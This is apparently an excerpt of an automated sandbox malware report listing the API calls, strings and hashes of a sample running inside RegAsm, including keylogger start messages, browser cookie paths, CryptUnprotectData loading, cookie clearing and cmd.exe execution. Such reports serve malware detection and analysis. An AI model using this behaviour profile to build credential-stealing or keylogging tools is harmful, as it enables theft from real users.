                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                      Strings
                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                      • User Data\Default\Network\Cookies, xrefs: 0040C603
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                      • API String ID: 1174141254-1980882731
                      • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                      • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                      • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                      • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                      APIs
                        • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                      Strings
                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                      • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                      • API String ID: 1174141254-1980882731
                      • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                      • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                      • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                      • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                      APIs
                      • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                      • wsprintfW.USER32 ref: 0040B1F3
                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: EventLocalTimewsprintf
                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                      • API String ID: 1497725170-1359877963
                      • Opcode ID: 4b61bdf1e4649f408c1e010907dbc1ed31b9c64e2b29a313bfb4962842f39c84
                      • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                      • Opcode Fuzzy Hash: 4b61bdf1e4649f408c1e010907dbc1ed31b9c64e2b29a313bfb4962842f39c84
                      • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                      APIs
                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                      • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateThread$LocalTime$wsprintf
                      • String ID: Online Keylogger Started
                      • API String ID: 112202259-1258561607
                      • Opcode ID: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
                      • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                      • Opcode Fuzzy Hash: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
                      • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                      APIs
                      • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                      • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: CryptUnprotectData$crypt32
                      • API String ID: 2574300362-2380590389
                      • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                      • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                      • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                      • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                      • CloseHandle.KERNEL32(?), ref: 004051CA
                      • SetEvent.KERNEL32(?), ref: 004051D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandleObjectSingleWait
                      • String ID: Connection Timeout
                      • API String ID: 2055531096-499159329
                      • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                      • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                      • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                      • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                      APIs
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Exception@8Throw
                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                      • API String ID: 2005118841-1866435925
                      • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                      • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                      • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                      • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                      APIs
                      • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                      • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                      • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseCreateValue
                      • String ID: pth_unenc
                      • API String ID: 1818849710-4028850238
                      • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                      • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                      • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                      • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                        • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                        • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                      • String ID: bad locale name
                      • API String ID: 3628047217-1405518554
                      • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                      • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                      • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                      • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                      APIs
                      • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                      • ShowWindow.USER32(00000009), ref: 00416C61
                      • SetForegroundWindow.USER32 ref: 00416C6D
                        • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                        • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                        • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                        • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                      • String ID: !D@
                      • API String ID: 186401046-604454484
                      • Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                      • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                      • Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                      • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                      APIs
                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell
                      • String ID: /C $cmd.exe$open
                      • API String ID: 587946157-3896048727
                      • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                      • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                      • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                      • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                      APIs
                      • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                      • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                      • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: TerminateThread$HookUnhookWindows
                      • String ID: pth_unenc
                      • API String ID: 3123878439-4028850238
                      • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                      • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                      • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                      • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                      APIs
                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                      • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: GetCursorInfo$User32.dll
                      • API String ID: 1646373207-2714051624
                      • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                      • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                      • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                      • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                      APIs
                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                      • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetLastInputInfo$User32.dll
                      • API String ID: 2574300362-1519888992
                      • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                      • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                      • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                      • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: __alldvrm$_strrchr
                      • String ID:
                      • API String ID: 1036877536-0
                      • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                      • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                      • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                      • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                      • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                      • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                      • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                      • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                      • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                      • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                      APIs
                      Strings
                      • Cleared browsers logins and cookies., xrefs: 0040C0F5
                      • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                      • API String ID: 3472027048-1236744412
                      • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                      • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                      • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                      • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                      APIs
                      • EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
                      • EnumDisplayDevicesW.USER32(?), ref: 00419525
                      • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
                      • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: DisplayEnum$Devices$Monitors
                      • String ID:
                      • API String ID: 1432082543-0
                      • Opcode ID: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                      • Instruction ID: 9f89b1fc864c89aa53311e19646eec67f909338e1adf78e73a6452d568b12732
                      • Opcode Fuzzy Hash: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                      • Instruction Fuzzy Hash: 6F218072108314ABD221DF26DC49EABBBECEBD1764F00053FF459D3190EB749A49C66A
                      APIs
                        • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                        • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                        • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                      • Sleep.KERNEL32(000001F4), ref: 0040A573
                      • Sleep.KERNEL32(00000064), ref: 0040A5FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$SleepText$ForegroundLength
                      • String ID: [ $ ]
                      • API String ID: 3309952895-93608704
                      • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                      • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                      • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                      • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: SystemTimes$Sleep__aulldiv
                      • String ID:
                      • API String ID: 188215759-0
                      • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                      • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                      • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                      • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                      • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                      • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                      • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                      • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                      • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                      • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
